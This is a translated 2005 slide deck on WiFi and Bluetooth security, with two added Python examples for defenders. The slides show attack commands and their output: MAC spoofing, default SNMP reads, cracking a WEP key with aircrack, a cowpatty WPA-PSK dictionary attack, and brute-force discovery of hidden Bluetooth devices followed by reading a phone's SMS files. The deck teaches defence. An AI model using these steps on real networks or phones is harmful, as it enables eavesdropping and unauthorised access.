
Wireless Network Security

21/10/2005

Nelson Murilo
<nelson@pangeia.com.br>
Profile

Auditor of the ICP.gov Root CA (AC-Raiz)
Two published books: Segurança de redes and Segurança em redes sem fio
Coordinated the DPF's Incident Handling and Response Center
Author of open-source security tools (e.g. www.chkrootkit.org)
Contributor to Cert.BR and CTIR.Gov

Nelson Murilo
nelson@pangeia.com.br
Wireless networks

WiFi
Bluetooth
Infrared
WiMax
Cellular (GSM/TDMA/CDMA etc.)
Characteristics of WiFi networks

WiFi uses the Industrial, Scientific & Medical (ISM) bands:
902-928 MHz
2.4-2.485 GHz (2.4 to 2.5 GHz in Brazil)
5.150-5.825 GHz

WiMax (802.16/a) uses licensed bands (10-66 GHz / 2-10 GHz)
Characteristics of WiFi networks

IEEE 802.11
Current standards:
802.11b: 22 Mb, 2.4 GHz
802.11a: 54 Mb, 5.1 GHz
802.11g: 54 Mb, 2.4 GHz
802.11i: security mechanisms
802.1x: authentication mechanisms, used in wired and wireless networks
Current standards

802.11b: WEP (802.1x)
802.11a/g: WEP/WPA (802.1x)
802.11i: WEP/WPA/RSN (AES, Ad Hoc, etc.)
802.11b channels

Channel   Frequency (GHz)
1         2.412
2         2.417
3         2.422
4         2.427
5         2.432
6         2.437
7         2.442
8         2.447
9         2.452
10        2.457
11        2.462
12        2.467
13        2.472
14        2.484
Usage model: Ad-Hoc

Usage model: Infrastructure

Usage model: open network (SSID broadcast)

Usage model: closed network (broadcast disabled)
Wired Equivalent Privacy (WEP)

WiFi Protected Access (WPA)

Available before the 802.11i standard

Two types:
WPA-PSK: pre-shared key
WPA(2) Enterprise (requires 802.1x)

WPA Pre-Shared Key (PSK)

802.1x (Extensible Authentication Protocol, EAP)
Wireless networks: main problems

Default configuration (passwords, network name, use of DHCP, SNMP, etc.)
Ineffective filtering methods
WEP weakness
Traffic eavesdropping
Denial of service
Problems with WPA and 802.1x
Factory settings: SNMP

# snmpwalk -Os -c public -v 1 192.168.0.1 system
sysDescr.0 = STRING: Netgear ProSafe Dual-Band Wireless Firewall FWAG114
sysObjectID.0 = OID: enterprises.0
sysUpTime.0 = Timeticks: (699775) 1:56:37.75
sysContact.0 = STRING: http://www.netgear.com
sysName.0 = STRING:
sysLocation.0 = STRING:
sysServices.0 = INTEGER: 6
MAC filter

$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:0C:41:E3:5F:5A
          inet addr:192.168.11.3  Bcast:192.168.11.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:842 errors:0 dropped:0 overruns:0 frame:0
          TX packets:637 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:152984 (149.3 KiB)  TX bytes:69539 (67.9 KiB)

c:\> ipconfig /all

Windows 2000 IP Configuration
[...]

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix . : xxx.com.br
        Description . . . . . . . . . . . : 3Com EtherLink XL 10/100 PCI For Complete PC Management NIC (3C905C-TX)
        Physical Address. . . . . . . . . : 00-04-76-16-3F-DB
MAC filter

Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01

FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01

OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Disable ESSID broadcast

23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.802928 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.831746 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.873675 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.887420 Assoc Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
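What the capture above demonstrates, as an added example that is not part of the original slides: a small Python parser over the same tcpdump management-frame lines (embedded below as a constructed sample) that reports which networks hide their name in beacons and which names clients still disclose in Probe and Assoc Requests. The `analyze` function and its result keys are this example's own.

```python
import re

# Constructed sample: the 802.11 management frames shown on the slide, a hidden
# AP beaconing an empty SSID on channel 11 and a client joining "NETGEAR".
SAMPLE_CAPTURE = """\
23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.802928 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.831746 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.873675 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.887420 Assoc Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
"""

# tcpdump prints "<time> <frame type> (<SSID>) [rates] ... CH: <n>" for beacons.
FRAME_RE = re.compile(
    r"^(?P<ts>\S+) (?P<type>Beacon|Probe Request|Assoc Request) \((?P<ssid>[^)]*)\)"
    r".*?(?:CH: (?P<ch>\d+))?$"
)

def analyze(capture: str) -> dict:
    """Summarise what a passive listener learns from management frames:
    channels whose beacons carry an empty SSID (the "hidden" networks), the
    SSIDs announced openly in beacons, and the SSIDs that appear only in
    client Probe/Assoc Requests, i.e. names that hiding the beacon did not protect."""
    hidden_channels = set()
    beacon_ssids = set()
    client_ssids = set()
    for line in capture.splitlines():
        m = FRAME_RE.match(line)
        if not m:
            continue
        ssid = m.group("ssid")
        if m.group("type") == "Beacon":
            if ssid == "":
                hidden_channels.add(int(m.group("ch")))
            else:
                beacon_ssids.add(ssid)
        else:
            client_ssids.add(ssid)
    return {
        "hidden_channels": sorted(hidden_channels),
        "beacon_ssids": sorted(beacon_ssids),
        "leaked_by_clients": sorted(client_ssids - beacon_ssids),
    }

if __name__ == "__main__":
    print(analyze(SAMPLE_CAPTURE))
```

The practical lesson is the one the slide makes: a hidden SSID only removes the name from beacons, while every client that joins announces it in clear text.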

Traffic eavesdropping: open network

# tcpdump -i eth0 -s 1700
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1700 bytes
17:09:38.193741 IP (tos 0x0, ttl 128, id 49930, offset 0, flags [DF], length: 48) 192.168.11.2.3597 > 200.155.13.26.http: S [tcp sum ok] 3524687372:3524687372(0) win 16384 <mss 1460,nop,nop,sackOK>
Traffic eavesdropping: isolation

PSPF (Publicly Secure Packet Forwarding) or Privacy Separator

ping -c 3 192.168.11.2
PING 192.168.11.2 (192.168.11.2) 56(84) bytes of data.
From 192.168.11.4 icmp_seq=1 Destination Host Unreachable
From 192.168.11.4 icmp_seq=2 Destination Host Unreachable
From 192.168.11.4 icmp_seq=3 Destination Host Unreachable
--- 192.168.11.2 ping statistics ---
3 packets transmitted, 0 received, +3 errors, 100% packet loss, time 2017ms

However, the traffic can still be captured:
22:44:37.605465 192.168.11.2.33010 > oscommerce.pulver.com.www: . ack 27075 win 59684 <nop,nop,timestamp 907215 341459491> (DF)
22:44:37.609406 oscommerce.pulver.com.www > 192.168.11.2.33010: P 27075:27120(45) ack 542 win 6492 <nop,nop,timestamp 341459495 907176> (DF)
22:44:37.613282 192.168.11.2.33010 > oscommerce.pulver.com.www: . ack 27120 win 59684 <nop,nop,timestamp 907216 341459495> (DF)
22:44:38.260568 192.168.11.2.33010 > oscommerce.pulver.com.www: P 542:996(454) ack 27120 win 59684 <nop,nop,timestamp 907280 341459495> (DF)
WEP weakness

# time aircrack trafego.cap   (72 MB, about 3 hours of capture)
aircrack 2.1
* Got 264394! unique IVs | fudge factor = 2
* Elapsed time [00:00:01] | tried 0 keys at 0 k/m
KB  depth  votes
 0  0/ 2   46( 28) 20( 15) 97( 13) D8( 12) DB( 10) BE(  8) 38(  5)
 1  0/ 2   41( 30) 97( 18) 4D( 13) D8( 13) 7E( 12) 91( 12) 86(  9)
 2  0/ 2   4E( 65) 51( 55) 0F( 15) 48( 15) B3( 15) 53(  9) F0(  5)
 3  0/ 2   54( 58) E9( 48) DA( 28) F6( 21) F3( 16) D1( 15) F4( 15)
 4  0/ 1   41(174) 5F( 41) 9A( 28) 9B( 24) 50( 22) A4( 21) F5( 21)
KEY FOUND! [ 46414E5441 ]
real 0m31.939s
user 0m0.706s
sys  0m0.533s
WEP weakness: decrypted traffic

# tcpdump -vvv -r trafego.cap
01:10:27.402389 Retry WEP Encrypted 258us Data IV:1fe1d0 Pad 0 KeyID 0
01:10:27.402553 0us Acknowledgment RA:00:09:5b:66:3d:0e
01:10:27.403501 WEP Encrypted 213us Data IV:52 Pad 0 KeyID 0
01:10:27.403702 0us Acknowledgment RA:00:02:2d:2b:e3:1d
01:10:27.440727 0us Beacon (NETGEAR) [1.0* 2.0* 5.5* 11.0* 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11, PRIVACY
01:10:27.442050 WEP Encrypted 258us Data IV:1fe1d1 Pad ...

# 802ether trafego.cap decifrado.cap 46414E5441
Read 528221 packets, wrote 264394 packets.

# tcpdump -vvv -r decifrado.cap
01:10:27.402389 IP (tos 0x8, ttl 47, id 22102, offset 0, flags [DF], length: 1440) freebsd.isc.org.40092 > 192.168.0.2.49181: . [tcp sum ok] 3457712421:3457713809(1388) ack 3715159866 win 65535 <nop,nop,timestamp 3442224490 2138687>
01:10:27.403501 IP (tos 0x0, ttl 64, id 23505, offset 0, flags [DF], length: 52) 192.168.0.2.49181 > freebsd.isc.org.40092: . [tcp sum ok] 1:1(0) ack 1388 win 32618 <nop,nop,timestamp 2138835 3442224490>

Denial of service (DoS)
Problems with WPA

The fixed keys of the PSK model (pre-shared keys) can be attacked by brute force and by dictionary.
The Enterprise model (802.1x/EAP) creates other points of vulnerability (client, RADIUS server, etc.).
Problems with WPA

# tcpdump -w trafego.log

# cowpatty -f /usr/share/dict/word -r trafego.log -s NETGEAR

cowpatty 2.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.
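To make the PSK weakness from the two slides above concrete, an added example that is not from the slides or from cowpatty: the WPA/WPA2 pre-shared key is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), so the SSID is the only salt (a factory name such as NETGEAR lets precomputed key tables be reused across networks) and a captured handshake can be guessed offline at the attacker's own speed. The `psk_risk` checker, its 60-bit entropy threshold and its list of common SSIDs are this example's own assumptions.

```python
import hashlib
import math

# Known test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_VECTOR = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2 PMK as 802.11i defines it:
    PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 iterations."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def passphrase_bits(passphrase: str) -> float:
    """Rough entropy estimate: length * log2(size of the character classes used).
    Once the 4-way handshake is captured the guessing is offline, so this
    estimate is the only quantity the network owner still controls."""
    classes = 0
    if any(c.islower() for c in passphrase):
        classes += 26
    if any(c.isupper() for c in passphrase):
        classes += 26
    if any(c.isdigit() for c in passphrase):
        classes += 10
    if any(not c.isalnum() for c in passphrase):
        classes += 33  # printable ASCII punctuation (assumed class size)
    return len(passphrase) * math.log2(classes) if classes else 0.0

# Factory SSIDs for which precomputed PMK tables are commonly built (assumed list).
COMMON_SSIDS = ("NETGEAR", "linksys", "default")

def psk_risk(passphrase: str, ssid: str, min_bits: float = 60.0) -> list:
    """Return the findings a defender should fix before deploying WPA-PSK."""
    findings = []
    if ssid in COMMON_SSIDS:
        findings.append("default SSID: precomputed PMK tables can be reused")
    if not 8 <= len(passphrase) <= 63:
        findings.append("WPA-PSK passphrase must be 8 to 63 characters")
    elif passphrase_bits(passphrase) < min_bits:
        findings.append("low passphrase entropy: dictionary/brute force is feasible")
    return findings

if __name__ == "__main__":
    assert wpa_psk("password", "IEEE").hex() == IEEE_VECTOR
    print(psk_risk("fanta123", "NETGEAR"))           # two findings
    print(psk_risk("Xk7#qP2m!vLw9Rz$", "homenet-7a"))  # []
```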

802.1x EAP
Conclusion

Wireless networks can be as secure as wired networks. However, they require additional effort, mainly in authentication/identification.
They are less resistant to denial-of-service attacks, or even to interference.
Bluetooth: basic characteristics

Frequency 2.4 GHz
Point-to-point or networked use (piconets 1+7)
Bluetooth hubs for connection to IP networks (routing)
Standard range from 10 to 250 meters

Bluetooth devices

Cell phones
Notebooks
PDAs
Printers/Fax
Headsets
Keyboard/Mouse
...
Piconet

Personal Area Network (PAN)

Distances

Standard range from 10 to 250 meters

wifitoys
Tools

# hcitool scan
Scanning ...
00:80:17:4E:26:4D Phantomd
00:60:57:DF:1D:28 Nokia 6600
00:07:10:0D:3C:48 tungsten
00:0A:19:01:D5:E0 Sander
Identified device

# hcitool scan
Scanning ...
00:60:57:DF:D1:28 Nokia 6600

Hidden device

# hcitool scan
Scanning ...
#
Hidden device

# hcitool info 00:60:57:DF:1D:28
Requesting information ...
BD Address: 00:60:57:DF:1D:28
Device Name: Nokia 6600
LMP Version: 1.1 (0x1) LMP Subversion: 0x248
Manufacturer: Nokia Mobile Phones (1)
Features: 0xbf 0x28 0x21 0x00 0x00 0x00 0x00 0x00
<3-slot packets> <5-slot packets> <encryption>
<slot offset> <timing accuracy> <role switch>
<sniff mode> <SCO link> <HV3 packets> <CVSD>
Hidden device

# fang -r 006057000000-006057FFFFFF
redfang - the bluetooth hunter ver 2.5
(c)2003 @stake Inc
author: Ollie Whitehouse <ollie@atstake.com>
Address range 00:60:57:00:00:00 -> 00:60:57:FF:FF:FF
Found: Nokia 6600 [00:60:75:fd:1d:01]
Getting Device Information.. Connected.
LMP Version: 1.1 (0x1) LMP Subversion: 0x248
Manufacturer: Nokia Mobile Phones (1)
Features: 0xbf 0x28 0x21 0x00
<3-slot packets>
<5-slot packets>
<encryption>
<slot offset>
<timing accuracy>
<role switch>
<sniff mode>
<SCO link>
<HV3 packets>
<CVSD>
Hidden device

# cat /usr/local/etc/btoui
Texas_Instruments 08:00:28
palm 00:07:E0
AppleKeyboard 00:0A:95
EricssonT68i 00:0A:D9
HP_iPAQ 08:00:28
HP_iPAQh5500 08:00:17
Nokia3650 00:60:57
Nokia6600 00:60:57
Nokia6820 00:02:ee
Nokia7650 00:02:EE
NokiaNGage 00:60:57
SiemensFujitsu_LOOX600 00:E0:00
SiemensS55 00:01:E3
SiemensSX1 00:01:E3
SonyEricssonP800 00:0A:D9
SonyEricssonT610 00:0A:D9
...

# tbsearch hci0
Using hci0...
Using 1 dev.
hci0: Trying 08:00:28:00:00:00
hci0: Trying 08:00:28:00:00:01
hci0: Trying 08:00:28:00:00:02
hci0: Trying 08:00:28:00:00:03
hci0: Trying 08:00:28:00:00:04
hci0: Trying 08:00:28:00:00:05
hci0: Trying 08:00:28:00:00:06
hci0: Trying 08:00:28:00:00:07
hci0: Trying 08:00:28:00:00:08
hci0: Trying 08:00:28:00:00:09
Risks

# tbsearch -n Nokia6600 hci0 hci1
** Using vendor Nokia6600
Using hci0...
Using hci1...
Using 2 devs.
hci0: Trying 00:60:57:00:00:00
hci1: Trying 00:60:57:00:00:01
hci1: Trying 00:60:57:00:00:02
hci0: Trying 00:60:57:00:00:03
hci1: Trying 00:60:57:00:00:04
hci0: Trying 00:60:57:00:00:05
hci1: Trying 00:60:57:00:00:06
hci0: Trying 00:60:57:00:00:07
hci1: Trying 00:60:57:00:00:08
hci0: Trying 00:60:57:00:00:09
hci1: Trying 00:60:57:00:00:0a
hci0: Trying 00:60:57:00:00:0b
hci1: Trying 00:60:57:00:00:0c
hci0: Trying 00:60:57:00:00:0d
[...]
Risks

Local device 00:11:61:AA:BB:55
Remote device 00:65:75:FF:10:92 (4)
Welcome
$
$ cd \system\data
$ find . sms*
-rw-rw-rw- 69 Apr 13 22:12 2005 c:\system\data\smsreast.dat
-rw-rw-rw- 64 Apr 13 12:01 2005 c:\system\data\smssegst.dat

Where:
\System\Data\smssegst.dat: sent SMS messages
\System\Data\smsreast.dat: received SMS messages
Risks

Several mobile commerce solutions rely heavily on SMS services:

PAGOWIND

CRANDY

\System\Data\smssegst.dat: sent SMS messages
\System\Data\smsreast.dat: received SMS messages
Access facilitators

Carriers deliver the card with a default PIN

Various pieces of information can be accessed remotely
Personal Area Network (PAN)

# hcitool scan
Scanning ...
00:10:60:A2:09:2C Bluetooth Access Point Router

PAN
Information leakage

Copying and storing data on a cell phone/PDA/notebook

Bridge between the local network and a dial-up network

Bridge between the local network and an external user

Copying data and sending it to an external user